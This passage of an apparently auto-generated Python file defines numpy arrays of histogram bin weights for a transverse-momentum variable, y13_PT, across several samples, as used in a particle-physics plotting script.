0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_2
y13_PT_2_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0375985630792,0.0375985630792,0.0751969092266,0.0376018480483,0.037652734079,0.0,0.0,0.0376234482696,0.0377193011884,0.0376123382562,0.03776126202,0.1129777571,0.0752863006732,0.0377260880585,0.188461155919,0.225943427993,0.0751962584308,0.112985504669,0.112761568946,0.0752603153281,0.150718519054,0.188208120328,0.0375701449976,0.112897941648,0.225815593111,0.112934649628,0.0376996843447,0.150720750353,0.113014511566,0.0752610745898,0.112927986719,0.226030200761,0.0376123382562,0.112913917135,0.0376333651574,0.0375576094316,0.0375985630792,0.0377286912416,0.0375576094316,0.0752228790765,0.0375701449976,0.0752773134936,0.112953460725,0.112804862359,0.0377635862906,0.0376714986901,0.03776126202,0.0377286912416,0.0,0.0,0.0376376263202,0.0,0.0376996843447,0.0,0.0,0.0,0.0,0.0,0.0376216663288,0.0,0.0,0.0,0.0,0.0752340045851,0.0376714986901,0.0,0.0,0.0,0.0,0.0376278488886,0.0377132115995,0.0375985630792,0.0,0.0,0.0,0.0,0.0377049526914,0.0,0.0,0.0,0.0,0.0377132115995,0.0,0.0377132115995,0.0,0.0,0.0,0.0,0.0,0.0376216663288,0.0,0.0,0.03776126202,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_3
y13_PT_3_weights = numpy.array([0.0,0.0,0.0206173151769,0.144168676778,0.206205449258,0.14430706847,0.144348918093,0.12361880546,0.185689536008,0.14441060325,0.268116992796,0.0823421883714,0.226891381364,0.165088918023,0.412619156379,0.185787647247,0.309546901079,0.350681256871,0.433226020576,0.2062375944,0.350633877065,0.453875541834,0.412182226202,0.371058382328,0.432826415327,0.288764381201,0.391784990988,0.247310706841,0.268078601442,0.433177574343,0.371182392497,0.516043027735,0.391823839382,0.722228824276,0.433208348365,0.288832784844,0.41265952824,0.535830266984,0.433087385129,0.66011283154,0.41263637155,0.412574366465,0.433062095586,0.330053521184,0.329859583905,0.226934038424,0.350629459012,0.371462253283,0.391765338271,0.18558182693,0.185637128762,0.37157361868,0.330193375404,0.329816469805,0.226835317798,0.247552328619,0.164868320081,0.309543701799,0.165002385129,0.206495821963,0.165075663865,0.330281127071,0.206253286104,0.24731664836,0.206283603087,0.268185548786,0.144401172992,0.082499623394,0.144527133198,0.082430244732,0.330095721204,0.082573222058,0.144296830775,0.165119082659,0.0618462477662,0.0824471095055,0.144540935804,0.0620128388222,0.103130192729,0.123837605712,0.0619774639313,0.0618680485711,0.0618347760639,0.0825847699337,0.0824654520416,0.123819994439,0.0618437645159,0.0206434883305,0.0412365499216,0.0205963979826,0.082550248184,0.0412681466157,0.0206173151769,0.0411700049072,0.0412723666177,0.0205470376697,0.0,0.0412543135403,0.0619128994233,0.0,0.0206242317146,0.0411644899586,0.0206213218937,0.0,0.0206783147734,0.0,0.0,0.0,0.0412052731554,0.0205802340036,0.0,0.0,0.0,0.0,0.0206614804692,0.0,0.0,0.0,0.0,0.0206405480402,0.0,0.0412488290611,0.0206022176244,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0205802340036,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0206041067228,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0205677872827,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0206099263647,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0206783147734,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_4
y13_PT_4_weights = numpy.array([0.0,0.0,0.125803766093,0.236813396866,0.273818275575,0.310878168056,0.314537786405,0.40708853791,0.421943458938,0.447820073609,0.347931446859,0.399719247696,0.384904309355,0.358946376513,0.395920441496,0.381114070874,0.299781619608,0.314609484682,0.310859379199,0.34039215507,0.299761177332,0.344214560074,0.27017008085,0.259023929821,0.396112087834,0.321904220713,0.355211602736,0.332986940562,0.303495951108,0.336744260966,0.307157222878,0.262638755536,0.262736156969,0.233143858,0.273845481839,0.225736088208,0.247960750382,0.233146262974,0.222036637482,0.2701666237,0.173913415252,0.177631654835,0.199880066124,0.207275059494,0.24044896548,0.173805341749,0.196184673791,0.136900555038,0.173921231417,0.181336967684,0.133215323718,0.129534556632,0.129487328961,0.114737445158,0.118503814276,0.0999140292845,0.111006474246,0.140651442138,0.0814197668407,0.118473210986,0.110987219425,0.0740681982766,0.0851136260029,0.0888341954038,0.0665784940381,0.0555107752122,0.0629130736894,0.0740029633662,0.0814061486774,0.066626563449,0.04073279831,0.055524303189,0.0444254850475,0.0406911321414,0.0443864493189,0.0665977187963,0.0333047215214,0.0370089521325,0.0295904802075,0.00740321086407,0.0296238341859,0.022199229578,0.025928982972,0.0333279595794,0.0222092402809,0.0185107665755,0.0221759313957,0.0111147120111,0.0111160798399,0.00370479277368,0.0222056177893,0.0110855186372,0.0222068202761,0.00370714814476,0.0148132759031,0.0110939886538,0.00738767473425,0.022189369186,0.00740516340205,0.0148099029275,0.0110909072813,0.00740490186117,0.0147980839851,0.0147822787988,0.00369858944476,0.00740791108445,0.011110168114,0.014813926749,0.0,0.0111173259169,0.0184891518747,0.00741379124504,0.0111051597564,0.00370835514091,0.00739627401818,0.00369801676041,0.0037037225604,0.0,0.0111091279629,0.0,0.0,0.00370564804244,0.0,0.0,0.00368965797384,0.00369868263749,0.0,0.0,0.0,0.00370323405013,0.0037037225604,0.0,0.0,0.0,0.00369887503538,0.00741044081612,0.00369613336541,0.0,0.00738969791834,0.00741129157555,0.00370479277368,0.0,0.0,0.00369082288296,0.00369801676041,0.00369613336541,0.00370448313332,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00370503627726,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00369801676041,0.0,0.00370564653933,0.0,0.0,0.00368965797384,0.0,0.00368965797384,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00370564804244,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00369535776141,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00370835514091,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00370047885219,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00369858944476,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_5
y13_PT_5_weights = numpy.array([0.0,0.0,0.0416079935461,0.0822384478336,0.10588608742,0.123838234077,0.120030960908,0.120062574777,0.138022823708,0.13894117136,0.165465973163,0.131365921046,0.139867216171,0.13138454127,0.148393568326,0.135152338364,0.153136113895,0.147445557352,0.128534461652,0.107754801706,0.124757436969,0.132345905991,0.126681801869,0.121933059561,0.128560809044,0.134233930696,0.135182256758,0.114407188101,0.111528435438,0.122894814391,0.107760653348,0.103992511158,0.0973601253742,0.0860244900463,0.100183857601,0.0907577330058,0.0794141004342,0.0794206272654,0.0765850867256,0.0822454848079,0.0614193268173,0.0690108566983,0.0652236441573,0.0567203084599,0.0680630707873,0.0633472627194,0.0614411579423,0.0604766873502,0.0538786311984,0.0529457594717,0.0548123731692,0.0661677690411,0.0510684177644,0.0368687188944,0.0415982558141,0.0491615477726,0.0434895064237,0.0463361500785,0.0425517283205,0.0311986881095,0.0293011357319,0.0330871929488,0.0368743004603,0.0311953721792,0.0283536499051,0.0292955991785,0.0226859297685,0.0208111987937,0.0273997422766,0.0217425700994,0.0179593036654,0.0236339107342,0.0208028414489,0.017022080718,0.0179604739938,0.0151307400831,0.0160618113047,0.015122712831,0.0179611791916,0.00850377532072,0.00850247595617,0.00850541077957,0.00472834558548,0.0122886261992,0.0122862765399,0.00944943813605,0.0056736137901,0.0103986629507,0.00661478434508,0.00756294986257,0.00944937961964,0.00189229190175,0.0047244594952,0.00378277429583,0.00378267376763,0.00283813326718,0.0066238063763,0.00661352249105,0.00188873440366,0.00377848159147,0.0,0.00567553132808,0.00378273078362,0.00189165272243,0.00472294407003,0.00189064593996,0.00189002176484,0.00473250025112,0.00094712047429,0.00283383005987,0.0,0.000945468960941,0.003783444984,0.000945490567002,0.00189377131682,0.000949241319314,0.00094518253058,0.00189290407351,0.0009447702149,0.0,0.00188862187209,0.00188920853668,0.00283383005987,0.00189338270779,0.000945336773854,0.0,0.0,0.0009447702149,0.000949241319314,0.000943555023966,0.0,0.0,0.00188886343986,0.0,0.00188867138598,0.0,0.00283532898041,0.0,0.000944141088393,0.00094366770558,0.0,0.0,0.0,0.000946146250961,0.0,0.000945323270066,0.0018902408263,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000945323270066,0.0,0.0,0.0,0.0,0.0,0.000945699725684,0.000945699725684,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00189076747406,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000944843135359,0.00188899097565,0.0,0.000944530597673,0.0,0.000945323270066,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000946217370915,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_6
y13_PT_6_weights = numpy.array([0.0,0.0,0.0161275102588,0.0268234986297,0.0418405165108,0.0568815386952,0.0407784113801,0.0514937479017,0.0494016283533,0.0515434585157,0.0547649012422,0.0429722015054,0.0536869382006,0.0655233502872,0.0601176396797,0.0493921435982,0.0461988552239,0.0579835322824,0.0709283486009,0.0697660724593,0.0525999777629,0.0590649818149,0.0730850244669,0.0461579920495,0.0494060895622,0.0343677216098,0.0536564220319,0.0333113823104,0.0354145836518,0.0354068533889,0.0343167251179,0.0354386741801,0.0257240168156,0.0322111619601,0.0343494643933,0.0257604600191,0.0300271977411,0.0224927969186,0.0268182688932,0.0204022331699,0.0279351494221,0.0236158706553,0.0203779177067,0.0182399076889,0.028999368941,0.0193558584869,0.0193294061421,0.0182320612096,0.0268073932905,0.0236089014221,0.0150642692068,0.0171744322835,0.015021749012,0.0214850623032,0.0182229850862,0.0161079184286,0.00646091023671,0.0203996876566,0.0118248429346,0.0150248006288,0.0171666045488,0.00858014568789,0.0139540055129,0.00964336799533,0.0107534929793,0.0075220818876,0.00967138738662,0.0107506625484,0.0107293274727,0.00751063644987,0.00858406705306,0.0064533224326,0.0118168015118,0.0118114255676,0.00644804021125,0.00643392554598,0.00751657848027,0.00536885502341,0.00429879844379,0.00429136059627,0.00537068824289,0.00428757419205,0.00644537098372,0.00430281353184,0.00430549400612,0.00321833300145,0.00429396609225,0.00215233687175,0.00430256610344,0.00644370271651,0.00321916451082,0.00215457234981,0.00107673264759,0.00429441221315,0.00322081703258,0.00215096814285,0.00107728636235,0.0,0.0,0.00107418863382,0.00213902972279,0.0,0.0021521006901,0.00215473467783,0.0,0.00107318917306,0.00107414777065,0.0,0.00215138577199,0.0,0.00106702670646,0.00106790582704,0.00107673264759,0.0010736821554,0.00107719713817,0.00107719713817,0.00107418863382,0.0,0.0,0.00107914769869,0.00107318917306,0.0,0.00107318917306,0.00106738285339,0.0,0.00106938289958,0.0,0.00214973474979,0.00107673264759,0.00107414777065,0.0,0.0,0.0,0.0,0.00429746383002,0.00322462330606,0.0,0.00107558660425,0.0,0.0,0.0,0.0010736821554,0.0,0.00107418863382,0.0,0.00107414777065,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00107414777065,0.0,0.0,0.0,0.00214993381718,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0010684108059,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_7
y13_PT_7_weights = numpy.array([0.0,0.0,0.0021871801519,0.00299713977265,0.00444646096453,0.00453647638499,0.00486105901594,0.00534800761375,0.00452929727959,0.00631305822787,0.00469156894997,0.00664378427454,0.00550445333323,0.00518235855776,0.00606334228775,0.00477835000113,0.0049401879077,0.0045361070571,0.00332132792999,0.00397030459894,0.00396853025349,0.0038073932841,0.00356340585518,0.00323955245035,0.00315919770434,0.00429248424124,0.00307810587417,0.00234294850833,0.00275350909875,0.0038069422326,0.00267234340301,0.00267394329997,0.00218692083658,0.00290866452805,0.00267274259144,0.00186388466791,0.00194361391393,0.00202331015618,0.0023480829517,0.00243047135847,0.00210588715591,0.00234919565017,0.00234989973056,0.00194364534609,0.00170134896739,0.00243118644012,0.00218117189447,0.00129536804271,0.00145781180416,0.0012963900594,0.00162013140858,0.00178180743952,0.00145868200352,0.00105378313096,0.0017013128204,0.00137729895439,0.00137676617927,0.00137691139585,0.0012152213776,0.000972915883577,0.00121513431052,0.0012153188173,0.0012148705947,0.000809472579428,0.000647621785677,0.000971614120661,0.00081047337941,0.00113416160824,0.000890826239487,0.000728841544733,0.000890623344892,0.000243179622403,0.000405051004218,0.000890708211725,0.000729075557166,0.00105241551766,0.000324589231706,0.000243013503436,0.000243294664109,0.000641646060536,0.000405333265017,0.000242677493643,0.000324352233218,0.000810245024766,0.00024299668723,0.000323939057472,0.000324029896415,0.00032386802079,0.000324193500809,0.000404628555985,0.000566567045463,0.0,0.000486509019049,0.00024276126035,0.0,0.000242740043642,0.000404708236511,0.000404820763645,0.000324013551692,0.000485976243933,0.000404787602716,0.000162179416986,0.000324335417012,8.0935329438e-05,0.000161913029428,0.000404877184372,8.09765527161e-05,8.10532629032e-05,0.000324426255955,0.000485586485146,0.000161800973777,0.000161931417242,0.000161901242368,0.000323991863501,0.000242871272911,8.10323133684e-05,0.0002432145121,0.000162061389224,0.0,0.000162259568994,0.00016181134639,0.000162063903797,8.09776214096e-05,0.000324320172415,0.000161968192869,8.09765527161e-05,8.09752325654e-05,0.000404644586387,0.000162039072391,8.12819475849e-05,0.000243123515997,8.12074847973e-05,0.0,8.07223136882e-05,8.07223136882e-05,0.000243239500668,0.000161934560458,0.0,0.000243243115366,0.0,0.0,0.0,8.12074847973e-05,0.0,8.10351579789e-05,0.0,8.08362867011e-05,0.0,0.0,8.09211849659e-05,0.0,0.0,0.0,0.0,8.08337249801e-05,8.08337249801e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.11095107539e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.09938718364e-05,0.0,8.09938718364e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.07223136882e-05,0.0,0.0,0.0,8.0935329438e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,8.09211849659e-05,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y13_PT_8
y13_PT_8_weights = numpy.array([0.0,0.0,0.000213065253097,0.000212802267456,0.000639311243562,0.000425833944364,0.00138280667362,0.000531402160305,0.00106379055852,0.000741113358129,0.000639150879674,0.000636853444244,0.000633163404353,0.000319452104416,0.000318190909252,0.00010653034359,0.000745845206476,0.000319605173975,0.000633945178309,0.000638855208755,0.000425782828374,0.0,0.000426393213424,0.000319823558409,0.000106490252618,0.000532625825865,0.000213060742862,0.000319377212253,0.000528389156705,0.000318429951673,0.0,0.000106490252618,0.000212980560918,0.00053102948131,0.0,0.000106609745988,0.000318960377507,0.000212872092566,0.000319332611046,0.0,0.000212912183538,0.0,0.000106609745988,0.0,0.0,0.000319025302609,0.000106381839948,0.000106609745988,0.000212763624213,0.000106381839948,0.000213293159137,0.000106683413149,0.0,0.000106609745988,0.0,0.000213100054288,0.000106490252618,0.000106490252618,0.000213366826298,0.000106381839948,0.0,0.000106609745988,0.000106609745988,0.000212995427987,0.0,0.0,0.0,0.000104897750115,0.000425932835428,0.0,0.0,0.0,0.0,0.0,0.000212802267456,0.000213065253097,0.000106490252618,0.000319481838553,0.0,0.000106683413149,0.0,0.000106381839948,0.0,0.0,0.0,0.0,0.0,0.000106490252618,0.0,0.0,0.0,0.0,0.000207938230265,0.0,0.0,0.000106381839948,0.0,0.000105748235543,0.0,0.0,0.0,0.000106683413149,0.0,0.0,0.0,0.0,0.0,0.000106683413149,0.0,0.000106312014838,0.0,0.0,0.000106609745988,0.0,0.000105748235543,0.000106609745988,0.0,0.0,0.0,0.0,0.0,0.000105949525632,0.0,0.0,0.0,0.0,0.0,0.0,0.000106312014838,0.0,0.0,0.0,0.000106381839948,0.0,0.00010653034359,0.0,0.0,0.000106490252618,0.0,0.0,0.000106490252618,0.0,0.0,0.0,0.0,0.0,0.0,0.00010560936487,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106312014838,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000106381839948,0.0,0.0,0.0,0.000106381839948,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
